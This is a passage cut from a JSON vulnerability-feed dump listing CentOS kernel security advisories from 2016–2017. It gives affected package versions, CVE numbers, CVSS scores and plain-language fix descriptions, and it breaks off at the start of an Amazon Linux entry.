"packageFilename": "kernel-abi-whitelists-2.6.32-642.13.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-642.13.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-642.13.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-642.13.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "any", "packageName": "kernel", "packageFilename": "kernel-2.6.32-642.13.1.el6.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-642.13.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-642.13.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-642.13.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-642.13.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "noarch", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-642.13.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "noarch", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-642.13.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-642.13.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-2.6.32-642.13.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageName": "perf", "packageFilename": "perf-2.6.32-642.13.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-642.13.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.32-642.13.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-642.13.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.32-642.13.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-642.13.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-642.13.1.el6.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2017:0036\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection. (CVE-2016-6828, Moderate)\n\nBug Fix(es):\n\n* When parallel NFS returned a file layout, a kernel crash sometimes occurred. This update removes the call to the BUG_ON() function from a code path of a client that returns the file layout. As a result, the kernel no longer crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash on a Nonmaskable Interrupt (NMI) that was injected from the host, this VM became unresponsive and did not create the vmcore dump file. This update applies a set of patches to the Virtual Machine Bus kernel driver (hv_vmbus) that fix this bug. As a result, the VM now first creates and saves the vmcore dump file and then reboots. (BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache occasionally showed incorrect values. This update fixes the DST_NOCOUNT mechanism, and the IPv6 routing cache now shows correct values. (BZ#1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over Ethernet (FCoE) stack, suboptimal performance in some cases occurred on systems with a large number of CPUs. This update fixes the fc_exch_alloc() function to try all the available exchange managers in the list for an available exchange ID. This change avoids failing allocations, which previously led to the host busy status. (BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot resolution automatically. Consequently, users were not able to change the resolution by manual setting of the kernel's 'vga=' parameter in the /boot/grub/grub.conf file. This update adds the 'nomodeset' parameter, which can be set in the /boot/grub/grub.conf file. The 'nomodeset' parameter allows the users to prevent the vmwgfx driver from loading. As a result, the setting of the 'vga=' parameter works as expected, in case that vmwgfx does not load. (BZ#1392875)\n\n* When Red Hat Enterprise Linux 6.8 was booted on SMBIOS 3.0 based systems, Desktop Management Interface (DMI) information, which is referenced by several applications, such as NEC server's memory RAS utility, was missing entries in the sysfs virtual file system. This update fixes the underlying source code, and sysfs now shows the DMI information as expected. (BZ#1393464)\n\n* Previously, bonding mode active backup and the propagation of the media access control (MAC) address to a VLAN interface did not work in Red Hat Enterprise Linux 6.8, when the fail_over_mac bonding parameter was set to fail_over_mac=active. With this update, the underlying source code has been fixed so that the VLANs continue inheriting the MAC address of the active physical interface until the VLAN MAC address is explicitly set to any value. As a result, IPv6 EUI64 addresses for the VLAN can reflect any changes to the MAC address of the physical interface, and Duplicate Address Detection (DAD) behaves as expected. (BZ#1396479)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-January/022206.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0036.html", "edition": 1, "reporter": "CentOS Project", "published": "2017-01-12T15:47:38", "title": "kernel, perf, python security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "modified": "2017-01-12T15:47:38", "href": "http://lists.centos.org/pipermail/centos-announce/2017-January/022206.html", "id": "CESA-2017:0036", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:25:06", "references": ["https://rhn.redhat.com/errata/RHSA-2017-0086.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageName": "kernel-tools-libs-devel", "packageFilename": "kernel-tools-libs-devel-3.10.0-514.6.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-514.6.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-514.6.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-3.10.0-514.6.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-514.6.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "any", "packageName": "kernel", "packageFilename": "kernel-3.10.0-514.6.1.el7.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageName": "kernel-tools", "packageFilename": "kernel-tools-3.10.0-514.6.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-3.10.0-514.6.1.el7.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-3.10.0-514.6.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-514.6.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-514.6.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "noarch", "packageName": "kernel-abi-whitelists", "packageFilename": "kernel-abi-whitelists-3.10.0-514.6.1.el7.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageName": "kernel-tools-libs", "packageFilename": "kernel-tools-libs-3.10.0-514.6.1.el7.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2017:0086\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous bug fixes, some of which you can see below. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/articles/2857831.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection. (CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of the SCTP protocol. A remote attacker could trigger an out-of-bounds read with an offset of up to 64kB potentially causing the system to crash. (CVE-2016-9555, Moderate)\n\nBug Fix(es):\n\n* Previously, the performance of Internet Protocol over InfiniBand (IPoIB) was suboptimal due to a conflict of IPoIB with the Generic Receive Offload (GRO) infrastructure. With this update, the data cached by the IPoIB driver has been moved from a control block into the IPoIB hard header, thus avoiding the GRO problem and the corruption of IPoIB address information. As a result, the performance of IPoIB has been improved. (BZ#1390668)\n\n* Previously, when a virtual machine (VM) with PCI-Passthrough interfaces was recreated, a race condition between the eventfd daemon and the virqfd daemon occurred. Consequently, the operating system rebooted. This update fixes the race condition. As a result, the operating system no longer reboots in the described situation. (BZ#1391611)\n\n* Previously, a packet loss occurred when the team driver in round-robin mode was sending a large number of packets. This update fixes counting of the packets in the round-robin runner of the team driver, and the packet loss no longer occurs in the described situation. (BZ#1392023)\n\n* Previously, the virtual network devices contained in the deleted namespace could be deleted in any order. If the loopback device was not deleted as the last item, other netns devices, such as vxlan devices, could end up with dangling references to the loopback device. Consequently, deleting a network namespace (netns) occasionally ended by a kernel oops. With this update, the underlying source code has been fixed to ensure the correct order when deleting the virtual network devices on netns deletion. As a result, the kernel oops no longer occurs under the described circumstances. (BZ#1392024)\n\n* Previously, a Kabylake system with a Sunrise Point Platform Controller Hub (PCH) with a PCI device ID of 0xA149 showed the following warning messages during the boot:\n\n \"Unknown Intel PCH (0xa149) detected.\"\n \"Warning: Intel Kabylake processor with unknown PCH - this hardware has not undergone testing by Red Hat and might not be certified. Please consult https://hardware.redhat.com for certified hardware.\"\n\nThe messages were shown because this PCH was not properly recognized. With this update, the problem has been fixed, and the operating system now boots without displaying the warning messages. (BZ#1392033)\n\n* Previously, the operating system occasionally became unresponsive after a long run. This was caused by a race condition between the try_to_wake_up() function and a woken up task in the core scheduler. With this update, the race condition has been fixed, and the operating system no longer locks up in the described scenario. (BZ#1393719)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-January/022246.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0086.html", "edition": 1, "reporter": "CentOS Project", "published": "2017-01-19T13:30:14", "title": "kernel, perf, python security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117", "CVE-2016-9555", "CVE-2016-6828"], "modified": "2017-01-19T13:30:14", "href": "http://lists.centos.org/pipermail/centos-announce/2017-January/022246.html", "id": "CESA-2017:0086", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:57", "references": ["https://rhn.redhat.com/errata/RHSA-2016-2962.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-417.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageName": "kernel-PAE-devel", "packageFilename": "kernel-PAE-devel-2.6.18-417.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-417.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.18-417.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageName": "kernel-PAE", "packageFilename": "kernel-PAE-2.6.18-417.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-417.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-417.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.18-417.el5.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.18-417.el5.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-417.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "any", "packageName": "kernel", "packageFilename": "kernel-2.6.18-417.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-417.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.18-417.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-417.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-417.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-417.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i386", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-417.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-417.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-417.el5.i686.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2016:2962\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating\nsystem.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg\nsubsystem. This may allows remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)\n\nBug Fix(es):\n\n* Previously, guest virtual machines (VMs) on a Hyper-V server cluster got in\nsome cases rebooted during the graceful node failover test, because the host\nkept sending heartbeat packets independently of guests responding to them. This\nupdate fixes the bug by properly responding to all the heartbeat messages in the\nqueue, even if they are pending. As a result, guest VMs no longer get rebooted\nunder the described circumstances. (BZ#1391167)\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-December/022182.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2962.html", "edition": 1, "reporter": "CentOS Project", "published": "2016-12-20T17:00:55", "title": "kernel security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117"], "modified": "2016-12-20T17:00:55", "href": "http://lists.centos.org/pipermail/centos-announce/2016-December/022182.html", "id": "CESA-2016:2962", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T21:04:19", "references": ["https://rhn.redhat.com/errata/RHSA-2016-1847.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "x86_64", "packageFilename": "kernel-devel-3.10.0-327.36.1.el7.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-3.10.0-327.36.1.el7.x86_64.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-3.10.0-327.36.1.el7.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-libs-3.10.0-327.36.1.el7.x86_64.rpm", "packageName": "kernel-tools-libs", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "x86_64", "packageFilename": "kernel-debug-devel-3.10.0-327.36.1.el7.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "noarch", "packageFilename": "kernel-doc-3.10.0-327.36.1.el7.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-libs-devel-3.10.0-327.36.1.el7.x86_64.rpm", "packageName": "kernel-tools-libs-devel", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "x86_64", "packageFilename": "kernel-debug-3.10.0-327.36.1.el7.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "x86_64", "packageFilename": "python-perf-3.10.0-327.36.1.el7.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "any", "packageFilename": "kernel-3.10.0-327.36.1.el7.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "x86_64", "packageFilename": "kernel-headers-3.10.0-327.36.1.el7.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "x86_64", "packageFilename": "kernel-3.10.0-327.36.1.el7.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-327.36.1.el7", "arch": "x86_64", "packageFilename": "perf-3.10.0-327.36.1.el7.x86_64.rpm", "packageName": "perf", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2016:1847\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A security flaw was found in the Linux kernel in the mark_source_chains() function in \"net/ipv4/netfilter/ip_tables.c\". It is possible for a user-supplied \"ipt_entry\" structure to have a large \"next_offset\" field. This field is not bounds checked prior to writing to a counter value at the supplied offset. (CVE-2016-3134, Important)\n\n* A flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitrary kernel memory when unloading a kernel module. This action is usually restricted to root-privileged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated privileges. (CVE-2016-4997, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)\n\nBug Fix(es):\n\n* In some cases, running the ipmitool command caused a kernel panic due to a race condition in the ipmi message handler. This update fixes the race condition, and the kernel panic no longer occurs in the described scenario. (BZ#1353947)\n\n* Previously, running I/O-intensive operations in some cases caused the system to terminate unexpectedly after a null pointer dereference in the kernel. With this update, a set of patches has been applied to the 3w-9xxx and 3w-sas drivers that fix this bug. As a result, the system no longer crashes in the described scenario. (BZ#1362040)\n\n* Previously, the Stream Control Transmission Protocol (SCTP) sockets did not inherit the SELinux labels properly. As a consequence, the sockets were labeled with the unlabeled_t SELinux type which caused SCTP connections to fail. The underlying source code has been modified, and SCTP connections now works as expected. (BZ#1354302)\n\n* Previously, the bnx2x driver waited for transmission completions when recovering from a parity event, which substantially increased the recovery time. With this update, bnx2x does not wait for transmission completion in the described circumstances. As a result, the recovery of bnx2x after a parity event now takes less time. (BZ#1351972)\n\nEnhancement(s):\n\n* With this update, the audit subsystem enables filtering of processes by name besides filtering by PID. Users can now audit by executable name (with the \"-F exe=<path-to-executable>\" option), which allows expression of many new audit rules. This functionality can be used to create events when specific applications perform a syscall. (BZ#1345774)\n\n* With this update, the Nonvolatile Memory Express (NVMe) and the multi-queue block layer (blk_mq) have been upgraded to the Linux 4.5 upstream version. Previously, a race condition between timeout and freeing request in blk_mq occurred, which could affect the blk_mq_tag_to_rq() function and consequently a kernel oops could occur. The provided patch fixes this race condition by updating the tags with the active request. The patch simplifies blk_mq_tag_to_rq() and ensures that the two requests are not active at the same time. (BZ#1350352)\n\n* The Hyper-V storage driver (storvsc) has been upgraded from upstream. This update provides moderate performance improvement of I/O operations when using storvscr for certain workloads. (BZ#1360161)\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included in this advisory. To see the complete list of bug fixes and enhancements, refer to the following KnowledgeBase article: https://access.redhat.com/articles/2592321\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-September/022085.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-1847.html", "edition": 2, "reporter": "CentOS Project", "published": "2016-09-19T15:43:06", "title": "kernel, perf, python security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-4997", "CVE-2016-4998", "CVE-2016-3134"], "modified": "2016-09-19T15:43:06", "id": "CESA-2016:1847", "href": "http://lists.centos.org/pipermail/centos-announce/2016-September/022085.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:28", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "i686", "packageFilename": "kernel-tools-4.4.19-29.55.amzn1.i686.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "i686", "packageFilename": "perf-4.4.19-29.55.amzn1.i686.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "x86_64", "packageFilename": "perf-4.4.19-29.55.amzn1.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "x86_64", "packageFilename": "kernel-headers-4.4.19-29.55.amzn1.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "i686", "packageFilename": "kernel-tools-debuginfo-4.4.19-29.55.amzn1.i686.rpm", "packageName": "kernel-tools-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "src", "packageFilename": "kernel-4.4.19-29.55.amzn1.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "i686", "packageFilename": "perf-debuginfo-4.4.19-29.55.amzn1.i686.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "noarch", "packageFilename": "kernel-doc-4.4.19-29.55.amzn1.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "i686", "packageFilename": 